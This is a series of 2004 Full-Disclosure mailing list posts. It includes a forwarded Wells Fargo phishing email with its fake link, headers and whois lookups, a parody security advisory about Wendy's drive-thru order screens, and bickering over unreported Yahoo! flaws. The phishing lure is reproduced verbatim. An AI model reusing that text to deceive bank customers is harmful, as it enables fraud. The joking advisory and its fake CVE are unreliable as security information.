Re: [Full-Disclosure] Your account at Wells Fargo has been suspended (Phishing Scam)
Hi, [Since phishing seems to be all the rage today, I feel compelled to add...] Babak Pasdar wrote: We have uncovered a phishing scam. This is a perfect example of a phishing scam. All indicators (that the recipient sees) show a valid and legitimate e-mail from Wells Fargo. This e-mail tells the user their account has been frozen due to fraudulent activity and gives them a link to go to. However when you click on the link it takes you to a site in Korea and not Wells Fargo: ... Here is a quick assessment that confirms the e-mail is fraudulent. In the header notice the source sending it to igxglobal is not identifiable via reverse DNS: lots of info eluded Well, maybe it's just me, but to me, the *very* first reason to believe that the mail was a fraud would be, that I never, ever would expect my bank to send me such sensitive and time-critical information in an email message, which can be read by any party while in transit and be delayed for arbitrary amounts of time, or not delivered at all. (insert rant here about why more and more applications are relying on email and SMS messages as a timely and dependable communications mechanism, when clearly neither was designed to be either) How would they maintain the privacy of banking operations if they sent such messages to customers? Please, please US people tell me that even US banks are not so stupid as to do this... convenience is surely a trump, but not in banking... there I want security first of all. P.S. Remember, when we used to tell people Never open messages claiming to be virus warnings or security patches from MS, they will never ever going to send such things in email, only offer them through the web.? Well, the other day I received an email from MS Hungary (I was registered for several TechNet events in the past) about the worm-du-jour and how it is dangerous and how MS recommends applying the patch immediately. Dang. The only thing missing was the patch attached. This is why police say as long as criminals are people there is not going to be a perfect crime. Everybody gets lazy after a time. Regards, Sz. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] IE Web Browser: Sitting Duck
On Wed, 7 Jul 2004, joe wrote: Of course you had FORTRAN and COBOL as well but you couldn't do fun games in those. You mean like Adventure? I still have the original FORTRAN source for that somewhere on a tape. -- Dave ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] IE Web Browser: Sitting Duck
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 autoMSdelete a whole lot of shit. Notice the anxiety displayed in the overwhelming mapping of the circuit board. Er///bored. Do you see the three prongs a the end of the adapter that fits into the wall socket? Do you ?? Do You?? That as I have been explaining all this time is so isolated from the Operating System that you're wrong and I am write. heh suckers, I be Microsfot Joe, dolls from Mattel coming soon. The lace on my shoes proves my point. While tied together so far removed. hehehehehehehe joe joe joe joe joe btw did i mention my last gig made a wack of dough and bought multicolor laces plus a fifth of sangria and puked my MVP .dlls' out. hint. I be jumpy so be you. -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.4 wkYEARECAAYFAkDrj40ACgkQ9hJzGKhH2LdYKQCghgxzNU5O6z+SSLMjZ8rDCxQNsIEA nRSzuUx+PfIxeettpY2Fcs/pF+qi =QfVo -END PGP SIGNATURE- Concerned about your privacy? Follow this link to get secure FREE email: http://www.hushmail.com/?l=2 Free, ultra-private instant messaging with Hush Messenger http://www.hushmail.com/services-messenger?l=434 Promote security and make money with the Hushmail Affiliate Program: http://www.hushmail.com/about-affiliate?l=427 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Wendy's Drive-up Order System Information Disclosure
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- SIPS EXCERPT -- ADVISORY -- SIPS EXCERPT -- ADVISORY -- Wendy's Drive-up Order System Information Disclosure Reporter: mi2g (http://www.mi2g.com/) Date: July 07, 2004 Severity: Medium to High Attack Class: Physical, Remote, Race Condition Vendor: Wendy's (http://www.wendys.com/) I. BACKGROUND Wendy's International, Inc. is one of the world's largest restaurant operating and franchising companies with more than 9,300 total restaurants and quality brands - Wendy's Old Fashioned Hamburgers®, Tim Hortons® and Baja Fresh® Mexican Grill. The Company invested in two additional quality brands during 2002 - Cafe Express and Pasta Pomodoro®. II. DESCRIPTION Remote exploitation of the Wendy's Drive-up ordering system allows an attacker to gain sensitive information about the order of arbitrary customers. During customer/vendor handshake, the customer vehicle must come to a stop beside the vendor menu ordering system which contains a large screen to display the current order. During this process, adequate protection is not given to the space between the vehicle and the menu allowing for a number of remote attackers to obtain sensitive order information. Once the victim has finished ordering, the information stays available on the screen for up to several minutes or until another customer has pulled forward. This creates a great window for exploitation and increases the chance of winning the race condition. III. ANALYSIS Successful exploitation allows unauthenticated remote malicious arbitrary attackers to retrieve the contents of the previous customer's food order which is a serious breach of confidentiality. As proof of concept, this attack was carried out against mi2g CEO DK Matai. It was disclosed that he ordered a grilled chicken sandwich, large fries and a large Coca-Cola. IV. DETECTION mi2g has confirmed that all Wendy's with a Drive-up menu display are affected. Other vendors may be affected but were not tested. V. WORKAROUND Use a hard object such as a rock or baseball bat to disable the order display screen after the late night drive-thru has closed. VI. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CAN-2004-2934 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. VII. DISCLOSURE TIMELINE 07/07/02 Exploit discovered by mi2g 07/08/02 mi2g clients (the Inner Sanctum) notified 01/08/03 The Queen notified 03/22/03 bespoke security architecture updated 09/01/03 mi2g clients notified again 07/07/04 Public Disclosure 07/08/04 Vendor notified VIII. CREDIT Rear Admiral John Hilton and Geoffrey Hancock are credited with discovering this vulnerability. IX. SPECIAL THANKS Donny Werner for verifying Wendy's drive up systems are not vulnerable to XSS issues! X. LEGAL NOTICES Copyright (c) 2004 mi2g Limited. Permission is granted for the redistribution of this alert electronically provided a small royalty is paid. It may not be edited in any way without the express written consent of mi2g. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.4 wkYEARECAAYFAkDrk18ACgkQa74Q1wBemg8ZEACfTaxcsaq/mkOAWZ8A5TPRhM/gq8gA n0pcaILhtSzHGnGbdBi1BCHQCi7s =YRgk -END PGP SIGNATURE- Concerned about your privacy? Follow this link to get secure FREE email: http://www.hushmail.com/?l=2 Free, ultra-private instant messaging with Hush Messenger http://www.hushmail.com/services-messenger?l=434 Promote security and make money with the Hushmail Affiliate Program: http://www.hushmail.com/about-affiliate?l=427 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Yahoo!
Heh.. Don't worry. I won't tell this list about the numerous cookie exploits which lead to thousands, probably millions of Yahoo! account's being compromised last year. If only the media had picked up on it at the time. It would have been a massive story for people like CNet News to run. Some things are ment to be kept underground, I guess. It's amazing the stuff that never makes it onto public security mailing lists, and it seem's like only the small issues are post here by security groups (for Yahoo! at least). And about telling Yahoo! about issues. I've given up on that now. They are ignorant people at the address [EMAIL PROTECTED] They only care for themselfs and have little public relation skills. They burnt there bridges with me and now they'll suffer. They know I get hold of alot of information for Yahoo! and send it to them directly at [EMAIL PROTECTED] or via other employee's who send it to the security team. I've noticed also from past advisories on here by the big security groups that Yahoo! Security seem to have a problem with public relations and the lack of feedback they give people. Anyway, it's not my problem anymore. They can find there own security loopholes from now on. I'm finished with helping them out, as I have done indirectly over the past 6 years and to [EMAIL PROTECTED] directly for the last 1/2 years. The script kiddies who hang on Yahoo! Chat will probably burn the place down (and that's just the ones who claim to have carried the out Akamia attack on Yahoo!), if they haven't managed to do so already. Cheerio On Tue, 6 Jul 2004 19:08:04 -0700 (PDT), VX Dude [EMAIL PROTECTED] wrote: --- System Outage [EMAIL PROTECTED] wrote: Yeah, i've contacted the Yahoo! Security Team over the past 1/2 years with various issues that they -did- follow up and patch, but did not once think to tell me about progress. It was only after I spoke to a representative of Yahoo! Security and said I was going to post all the underground security issues with Yahoo! to FD, that I received an e-mail to say sorry that we didn't contact you. We've been reading -all- mails are we've been taking further action(s), after all this time. snip I guess the same may apply for Google Security Team. After all, Yahoo! and Google were very good partners, up until recently. Google and Yahoo! seem to have very quickly become rivals, with regards of Search and E-mail. The things I could tell FD about Yahoo! would rock the Yahoo! Security Team to it's foundations (and they know it). Luckily for them, I have morals. Yahoo! are aware of who I am, even though they know me on another alias. Cheerio snip I would just like to point out that some of us who use yahoo enjoy their security holes, if they didnt have such security holes we move on to using something like gmail! So please, stop telling yahoo, if they really cared, they'd do it on their own, and don't blab to FD either. Why ruin everyone's fun for 2 inches of fame? PS: FD keep sending those viruses. I don't know what the fuck it has to do for your cause, but it helps out my cause ;p __ Do you Yahoo!? New and Improved Yahoo! Mail - 100MB free storage! http://promotions.yahoo.com/new_mail ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Yahoo!
OMG MY E-PENIS YOUR E-PENIS. Jesus christ. On Wed, 7 Jul 2004 10:03:14 +0100, System Outage [EMAIL PROTECTED] wrote: Heh.. Don't worry. I won't tell this list about the numerous cookie exploits which lead to thousands, probably millions of Yahoo! account's being compromised last year. If only the media had picked up on it at the time. It would have been a massive story for people like CNet News to run. Some things are ment to be kept underground, I guess. It's amazing the stuff that never makes it onto public security mailing lists, and it seem's like only the small issues are post here by security groups (for Yahoo! at least). And about telling Yahoo! about issues. I've given up on that now. They are ignorant people at the address [EMAIL PROTECTED] They only care for themselfs and have little public relation skills. They burnt there bridges with me and now they'll suffer. They know I get hold of alot of information for Yahoo! and send it to them directly at [EMAIL PROTECTED] or via other employee's who send it to the security team. I've noticed also from past advisories on here by the big security groups that Yahoo! Security seem to have a problem with public relations and the lack of feedback they give people. Anyway, it's not my problem anymore. They can find there own security loopholes from now on. I'm finished with helping them out, as I have done indirectly over the past 6 years and to [EMAIL PROTECTED] directly for the last 1/2 years. The script kiddies who hang on Yahoo! Chat will probably burn the place down (and that's just the ones who claim to have carried the out Akamia attack on Yahoo!), if they haven't managed to do so already. Cheerio On Tue, 6 Jul 2004 19:08:04 -0700 (PDT), VX Dude [EMAIL PROTECTED] wrote: --- System Outage [EMAIL PROTECTED] wrote: Yeah, i've contacted the Yahoo! Security Team over the past 1/2 years with various issues that they -did- follow up and patch, but did not once think to tell me about progress. It was only after I spoke to a representative of Yahoo! Security and said I was going to post all the underground security issues with Yahoo! to FD, that I received an e-mail to say sorry that we didn't contact you. We've been reading -all- mails are we've been taking further action(s), after all this time. snip I guess the same may apply for Google Security Team. After all, Yahoo! and Google were very good partners, up until recently. Google and Yahoo! seem to have very quickly become rivals, with regards of Search and E-mail. The things I could tell FD about Yahoo! would rock the Yahoo! Security Team to it's foundations (and they know it). Luckily for them, I have morals. Yahoo! are aware of who I am, even though they know me on another alias. Cheerio snip I would just like to point out that some of us who use yahoo enjoy their security holes, if they didnt have such security holes we move on to using something like gmail! So please, stop telling yahoo, if they really cared, they'd do it on their own, and don't blab to FD either. Why ruin everyone's fun for 2 inches of fame? PS: FD keep sending those viruses. I don't know what the fuck it has to do for your cause, but it helps out my cause ;p __ Do you Yahoo!? New and Improved Yahoo! Mail - 100MB free storage! http://promotions.yahoo.com/new_mail ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Yahoo!
On Tue, 6 Jul 2004 19:08:04 -0700 (PDT), VX Dude [EMAIL PROTECTED] wrote: I would just like to point out that some of us who use yahoo enjoy their security holes, if they didnt have such security holes we move on to using something like gmail! So please, stop telling yahoo, if they really cared, they'd do it on their own, and don't blab to FD either. Why ruin everyone's fun for 2 inches of fame? Heh.. Don't worry. I won't tell this list about the numerous cookie exploits which lead to thousands, probably millions of Yahoo! account's being compromised last year. If only the media had picked up on it at the time. It would have been a massive story for people like CNet News to run. Some things are ment to be kept underground, I guess. It's amazing the stuff that never makes it onto public security mailing lists, and it seem's like only the small issues are post here by security groups (for Yahoo! at least). And about telling Yahoo! about issues. I've given up on that now. They are ignorant people at the address [EMAIL PROTECTED] They only care for themselfs and have little public relation skills. They burnt there bridges with me and now they'll suffer. They know I get hold of alot of information for Yahoo! and send it to them directly at [EMAIL PROTECTED] or via other employee's who send it to the security team. I've noticed also from past advisories on here by the big security groups that Yahoo! Security seem to have a problem with public relations and the lack of feedback they give people. Anyway, it's not my problem anymore. They can find there own security loopholes from now on. I'm finished with helping them out, as I have done indirectly over the past 6 years and to [EMAIL PROTECTED] directly for the last 1/2 years. The script kiddies who hang on Yahoo! Chat will probably burn the place down (and that's just the ones who claim to have carried the out Akamia attack on Yahoo!), if they haven't managed to do so already. Cheerio ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Wendy's Drive-up Order System Information Disclosure
oh shi-- -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of [EMAIL PROTECTED] Sent: Wednesday, July 07, 2004 8:06 AM To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: [Full-Disclosure] Wendy's Drive-up Order System Information Disclosure -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- SIPS EXCERPT -- ADVISORY -- SIPS EXCERPT -- ADVISORY -- Wendy's Drive-up Order System Information Disclosure Reporter: mi2g (http://www.mi2g.com/) Date: July 07, 2004 Severity: Medium to High Attack Class: Physical, Remote, Race Condition Vendor: Wendy's (http://www.wendys.com/) I. BACKGROUND Wendy's International, Inc. is one of the world's largest restaurant operating and franchising companies with more than 9,300 total restaurants and quality brands - Wendy's Old Fashioned HamburgersR, Tim HortonsR and Baja FreshR Mexican Grill. The Company invested in two additional quality brands during 2002 - Cafe ExpressT and Pasta PomodoroR. II. DESCRIPTION Remote exploitation of the Wendy's Drive-up ordering system allows an attacker to gain sensitive information about the order of arbitrary customers. During customer/vendor handshake, the customer vehicle must come to a stop beside the vendor menu ordering system which contains a large screen to display the current order. During this process, adequate protection is not given to the space between the vehicle and the menu allowing for a number of remote attackers to obtain sensitive order information. Once the victim has finished ordering, the information stays available on the screen for up to several minutes or until another customer has pulled forward. This creates a great window for exploitation and increases the chance of winning the race condition. III. ANALYSIS Successful exploitation allows unauthenticated remote malicious arbitrary attackers to retrieve the contents of the previous customer's food order which is a serious breach of confidentiality. As proof of concept, this attack was carried out against mi2g CEO DK Matai. It was disclosed that he ordered a grilled chicken sandwich, large fries and a large Coca-Cola. IV. DETECTION mi2g has confirmed that all Wendy's with a Drive-up menu display are affected. Other vendors may be affected but were not tested. V. WORKAROUND Use a hard object such as a rock or baseball bat to disable the order display screen after the late night drive-thru has closed. VI. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CAN-2004-2934 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. VII. DISCLOSURE TIMELINE 07/07/02 Exploit discovered by mi2g 07/08/02 mi2g clients (the Inner Sanctum) notified 01/08/03 The Queen notified 03/22/03 bespoke security architecture updated 09/01/03 mi2g clients notified again 07/07/04 Public Disclosure 07/08/04 Vendor notified VIII. CREDIT Rear Admiral John Hilton and Geoffrey Hancock are credited with discovering this vulnerability. IX. SPECIAL THANKS Donny Werner for verifying Wendy's drive up systems are not vulnerable to XSS issues! X. LEGAL NOTICES Copyright (c) 2004 mi2g Limited. Permission is granted for the redistribution of this alert electronically provided a small royalty is paid. It may not be edited in any way without the express written consent of mi2g. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.4 wkYEARECAAYFAkDrk18ACgkQa74Q1wBemg8ZEACfTaxcsaq/mkOAWZ8A5TPRhM/gq8gA n0pcaILhtSzHGnGbdBi1BCHQCi7s =YRgk -END PGP SIGNATURE- Concerned about your privacy? Follow this link to get secure FREE email: http://www.hushmail.com/?l=2 Free, ultra-private instant messaging with Hush Messenger http://www.hushmail.com/services-messenger?l=434 Promote security and make money with the Hushmail Affiliate Program: http://www.hushmail.com/about-affiliate?l=427 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Your account at Wells Fargo has been suspended (Phishing Scam)
ATTENTION, We have uncovered a phishing scam. This is a perfect example of a phishing scam. All indicators (that the recipient sees) show a valid and legitimate e-mail from Wells Fargo. This e-mail tells the user their account has been frozen due to fraudulent activity and gives them a link to go to. However when you click on the link it takes you to a site in Korea and not Wells Fargo: http://online_wellsfargo_com_account.rndsystems.co.kr:7301/wells.htm If you clink on the link an exact model of the Wells Fargo web site replicated. This is the exact type of issue we had success with in working with the FBI which led to an arrest of an unsavory Russian character. There are no products to protect against phishing other than user education and vigilance along with refining the current model for mail. Babak Here is a quick assessment that confirms the e-mail is fraudulent. In the header notice the source sending it to igxglobal is not identifiable via reverse DNS: Received: from dns (unknown [211.238.157.101]) by imgxs43.goimaginex.net (Postfix) with SMTP id 15105B0016 for [EMAIL PROTECTED]; Tue, 6 Jul 2004 15:08:21 -0400 (EDT) Further research shows that the contact for the network IP in question is Kanghyun Lee out of Seoul, South Korea: person: KANGHYUN LEE descr: BUSYKOREA descr: , Guro 5(o)-dong , Guro-gu descr: SEOUL descr: 152-055 country: KR phone: +82-2-862-1780 e-mail: [EMAIL PROTECTED] nic-hdl: KL512-KR mnt-by: MNT-KRNIC-AP Further investigation on the web site shows the following owner: Domain Name : rndsystems.co.kr Registrant: RD SYSTEMS Registrant Address: Pusan Venture Bldg.#305 651-1 Eomgung-dong, Sasang-gu, Busan, Republic of Korea Registrant Zip Code : 617831 Administrative Contact(AC): Kang Young Gyun AC E-Mail: [EMAIL PROTECTED] AC Phone Number : 0513261777 Registered Date : 2002. 05. 17. Last updated Date : 2003. 04. 24. Expiration Date : 2005. 05. 17. Publishes : Y Authorized Agency : I-NAMES(the I stands for Internet) Corporation (http://www.i-names.co.kr) Primary Name Server Host Name : www.rndsystems.co.kr IP Address : 211.33.221.36 - KRNIC Whois Service - Return-Path: [EMAIL PROTECTED] Received: from groupware.igxglobal.com ([unix socket]) by groupware (Cyrus v2.1.16) with LMTP; Tue, 06 Jul 2004 15:08:31 -0400 Received: from dns (unknown [211.238.157.101]) by imgxs43.goimaginex.net (Postfix) with SMTP id 15105B0016 for [EMAIL PROTECTED]; Tue, 6 Jul 2004 15:08:21 -0400 (EDT) From: Wells Fargo National Association [EMAIL PROTECTED] To: Bpasdar [EMAIL PROTECTED] Subject: Your account at Wells Fargo has been suspended Date: Wed, 7 Jul 2004 03:59:20 +0900 Reply-To: Wells Fargo National Association [EMAIL PROTECTED] Message-ID: [EMAIL PROTECTED] MIME-Version: 1.0 X-Priority: 3 (Normal) Importance: Normal X-Mailer: EM: 4.52.0.790 Content-Type: multipart/alternative; boundary=_PartID_337380760025388 X-Virus-Scanned: IGX Global Secure Mail Relay X-Evolution-Source: imap://[EMAIL PROTECTED]:993/ -Forwarded Message- From: Wells Fargo National Association [EMAIL PROTECTED] To: Bpasdar [EMAIL PROTECTED] Subject: Your account at Wells Fargo has been suspended Date: Wed, 07 Jul 2004 03:59:20 +0900 Dear Wells Fargo account holder, We regret to inform you, that we had to block your Wells Fargo account because we have been notified that your account may have been compromised by outside parties. Our terms and conditions you agreed to state that your account must always be under your control or those you designate at all times. We have noticed some activity related to your account that indicates that other parties may have access and or control of your information in your account. These parties have in the past been involved with money laundering, illegal drugs, terrorism and various Federal Title 18 violations. In order that you may access your account we must verify your identity by clicking on the link below. Please be aware that until we can verify your identity no further access to your account will be allowed and we will have no other liability for your account or any transactions that may have occurred as a result of your failure to reactivate your account as instructed below. Thank you for your time and consideration in this matter. Please follow the link below and renew your account information https://online.wellsfargo.com/cgi-bin/signon.cgi Before you reactivate your account, all payments have been frozen, and you will not be able to use your account in any way until we have verified your identity. -- Babak Pasdar Founder / Chief Technology Information Security Officer e-mail: [EMAIL PROTECTED] phone: 201.498.0555 x2205 pgp fingerprint: F901 028B 7658 8621 3EF9 D505 BBF2 35F2 C922 B416 Get Daily
RE: [Full-Disclosure] Wendy's Drive-up Order System Information D isclosure
My understanding is that McDonalds is recommending the abandonment of Wendy's as a late-night drive-thru and adoption of it as an alternative eatery. Wendy's is rapidly preparing a fix, which involves PGP PKI. You *will* have to email your public key to Wendy's in order to submit or confirm your order. Lastly, as expected, it has been found that Wendy's utilizes a client-server app, running on IIS 5.0, for its menuing. The menu display itself is IE 6.0 SP1 (of course)! Rob -Original Message- From: Sapheriel [mailto:[EMAIL PROTECTED] Sent: Wednesday, July 07, 2004 6:32 AM To: [EMAIL PROTECTED]; [EMAIL PROTECTED] Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] Wendy's Drive-up Order System Information Disclosure oh shi-- -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of [EMAIL PROTECTED] Sent: Wednesday, July 07, 2004 8:06 AM To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: [Full-Disclosure] Wendy's Drive-up Order System Information Disclosure *** PGP SIGNATURE VERIFICATION *** *** Status: Unknown Signature *** Signer: Unknown Key (0x005E9A0F) *** Signed: 7/7/2004 2:08:31 AM *** Verified: 7/7/2004 7:32:21 AM *** BEGIN PGP VERIFIED MESSAGE *** -- SIPS EXCERPT -- ADVISORY -- SIPS EXCERPT -- ADVISORY -- Wendy's Drive-up Order System Information Disclosure Reporter: mi2g (http://www.mi2g.com/) Date: July 07, 2004 Severity: Medium to High Attack Class: Physical, Remote, Race Condition Vendor: Wendy's (http://www.wendys.com/) I. BACKGROUND Wendy's International, Inc. is one of the world's largest restaurant operating and franchising companies with more than 9,300 total restaurants and quality brands - Wendy's Old Fashioned HamburgersR, Tim HortonsR and Baja FreshR Mexican Grill. The Company invested in two additional quality brands during 2002 - Cafe ExpressT and Pasta PomodoroR. II. DESCRIPTION Remote exploitation of the Wendy's Drive-up ordering system allows an attacker to gain sensitive information about the order of arbitrary customers. During customer/vendor handshake, the customer vehicle must come to a stop beside the vendor menu ordering system which contains a large screen to display the current order. During this process, adequate protection is not given to the space between the vehicle and the menu allowing for a number of remote attackers to obtain sensitive order information. Once the victim has finished ordering, the information stays available on the screen for up to several minutes or until another customer has pulled forward. This creates a great window for exploitation and increases the chance of winning the race condition. III. ANALYSIS Successful exploitation allows unauthenticated remote malicious arbitrary attackers to retrieve the contents of the previous customer's food order which is a serious breach of confidentiality. As proof of concept, this attack was carried out against mi2g CEO DK Matai. It was disclosed that he ordered a grilled chicken sandwich, large fries and a large Coca-Cola. IV. DETECTION mi2g has confirmed that all Wendy's with a Drive-up menu display are affected. Other vendors may be affected but were not tested. V. WORKAROUND Use a hard object such as a rock or baseball bat to disable the order display screen after the late night drive-thru has closed. VI. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CAN-2004-2934 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. VII. DISCLOSURE TIMELINE 07/07/02 Exploit discovered by mi2g 07/08/02 mi2g clients (the Inner Sanctum) notified 01/08/03 The Queen notified 03/22/03 bespoke security architecture updated 09/01/03 mi2g clients notified again 07/07/04 Public Disclosure 07/08/04 Vendor notified VIII. CREDIT Rear Admiral John Hilton and Geoffrey Hancock are credited with discovering this vulnerability. IX. SPECIAL THANKS Donny Werner for verifying Wendy's drive up systems are not vulnerable to XSS issues! X. LEGAL NOTICES Copyright (c) 2004 mi2g Limited. Permission is granted for the redistribution of this alert electronically provided a small royalty is paid. It may not be edited in any way without the express written consent of mi2g. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. *** END PGP VERIFIED
RE: [Full-Disclosure] Your account at Wells Fargo has been suspended (Phishing Scam)
There are no products to protect against phishing other than user education and vigilance along with refining the current model for mail. Sender ID would have blocked this because of the fraudulent From: header, even assuming it wasn't blocked because of envelope problems. This is yet another reason we need an SNTP authentication scheme in place, and not one just based on envelope data. Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blog.ziffdavis.com/seltzer [EMAIL PROTECTED] From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Babak Pasdar Sent: Wednesday, July 07, 2004 7:10 AM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] Your account at Wells Fargo has been suspended (Phishing Scam) ATTENTION, We have uncovered a phishing scam. This is a perfect example of a phishing scam. All indicators (that the recipient sees) show a valid and legitimate e-mail from Wells Fargo. This e-mail tells the user their account has been frozen due to fraudulent activity and gives them a link to go to. However when you click on the link it takes you to a site in Korea and not Wells Fargo: http://online http://online _wellsfargo_com_account.rndsystems.co.kr:7301/wells.htm If you clink on the link an exact model of the Wells Fargo web site replicated. This is the exact type of issue we had success with in working with the FBI which led to an arrest of an unsavory Russian character. There are no products to protect against phishing other than user education and vigilance along with refining the current model for mail. Babak Here is a quick assessment that confirms the e-mail is fraudulent. In the header notice the source sending it to igxglobal is not identifiable via reverse DNS: Received: from dns (unknown [211.238.157.101]) by imgxs43.goimaginex.net (Postfix) with SMTP id 15105B0016 for [EMAIL PROTECTED]; Tue, 6 Jul 2004 15:08:21 -0400 (EDT) Further research shows that the contact for the network IP in question is Kanghyun Lee out of Seoul, South Korea: person: KANGHYUN LEE descr:BUSYKOREA descr:, Guro 5(o)-dong , Guro-gu descr:SEOUL descr:152-055 country: KR phone:+82-2-862-1780 e-mail: [EMAIL PROTECTED] nic-hdl: KL512-KR mnt-by: MNT-KRNIC-AP Further investigation on the web site shows the following owner: Domain Name : rndsystems.co.kr Registrant: RD SYSTEMS Registrant Address: Pusan Venture Bldg.#305 651-1 Eomgung-dong, Sasang-gu, Busan, Republic of Korea Registrant Zip Code : 617831 Administrative Contact(AC): Kang Young Gyun AC E-Mail: [EMAIL PROTECTED] AC Phone Number : 0513261777 Registered Date : 2002. 05. 17. Last updated Date : 2003. 04. 24. Expiration Date : 2005. 05. 17. Publishes : Y Authorized Agency : I-NAMES(the I stands for Internet) Corporation (http://www.i-names.co.kr http://www.i-names.co.kr ) Primary Name Server Host Name : www.rndsystems.co.kr http://www.rndsystems.co.kr IP Address : 211.33.221.36 - KRNIC Whois Service - Return-Path: [EMAIL PROTECTED] Received: from groupware.igxglobal.com ([unix socket]) by groupware (Cyrus v2.1.16) with LMTP; Tue, 06 Jul 2004 15:08:31 -0400 Received: from dns (unknown [211.238.157.101]) by imgxs43.goimaginex.net (Postfix) with SMTP id 15105B0016 for [EMAIL PROTECTED]; Tue, 6 Jul 2004 15:08:21 -0400 (EDT) From: Wells Fargo National Association [EMAIL PROTECTED] To: Bpasdar [EMAIL PROTECTED] Subject: Your account at Wells Fargo has been suspended Date: Wed, 7 Jul 2004 03:59:20 +0900 Reply-To: Wells Fargo National Association [EMAIL PROTECTED] Message-ID: [EMAIL PROTECTED] MIME-Version: 1.0 X-Priority: 3 (Normal) Importance: Normal X-Mailer: EM: 4.52.0.790 Content-Type: multipart/alternative; boundary=_PartID_337380760025388 X-Virus-Scanned: IGX Global Secure Mail Relay X-Evolution-Source: imap://[EMAIL PROTECTED]:993/ -Forwarded Message- From: Wells Fargo National Association [EMAIL PROTECTED] To: Bpasdar [EMAIL PROTECTED] Subject: Your account at Wells Fargo has been suspended Date: Wed, 07 Jul 2004 03:59:20 +0900 Dear Wells Fargo account holder, We regret to inform you, that we had to block your Wells Fargo account because we have been notified that your account may have been compromised by outside parties. Our terms and conditions you agreed to state that your account must always be under your control or those you designate at all times. We have noticed some activity related to your account that indicates that other parties may have access and or control of your information in your account. These parties have in the past been involved with money laundering, illegal drugs, terrorism and various Federal Title 18 violations. In order that you may access your account we must verify your identity by
Re: [Full-Disclosure] Yahoo!
On Wed, 7 Jul 2004 19:54:59 +1000, Geoffrey Huntley [EMAIL PROTECTED] wrote: OMG MY E-PENIS YOUR E-PENIS. Jesus christ. Yahoo! spend very little time preventing security blunders from happening. They would rather wait until the problem comes to them than preventing the whole thing from ever happening. Take Yahoo! Messenger for instance. They build the client over 6 months and rush the coding. Yahoo! care more about deadlines for projects, than checking protocol's for potential vulnerabilities before release. The end result? People get disconnected from Yahoo! Chat/Messenger or have cookies stolen (because the system is handing them out, because of obvious and petty flaws on protocol) and in the end, the consumer loses the account to script kiddies. Why sweep up from the aftermath of a major security incident due to messy coding, when you can take an extra month on a project to review potential vulnerabilities, saving everyone alot of time and energy and money in the long run. If every vulnerability that Yahoo! has had and still has was disclosed on Full-Disclosure, they'd look just as bad as Microsoft do at the moment. Geoffery loves my e-penis. Cheerio ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] IE Web Browser: Sitting Duck
